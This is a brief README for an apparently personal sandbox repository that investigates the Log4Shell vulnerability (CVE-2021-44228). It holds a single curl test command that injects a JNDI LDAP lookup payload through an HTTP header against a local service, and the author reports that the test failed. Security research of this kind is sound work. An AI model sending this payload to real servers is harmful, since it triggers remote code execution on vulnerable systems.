# log4shell sanbox #

This is a sandbox repository to investigate what is happening with CVE-2021-44228.

### What is this repository for? ###

* Experimental java project to debug the security issue
* docker container
* [CVE entry](https://www.cve.org/CVERecord?id=CVE-2021-44228)

### How to test? ###

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/ABC}`

I was not able to reproduce, my java version is too new probably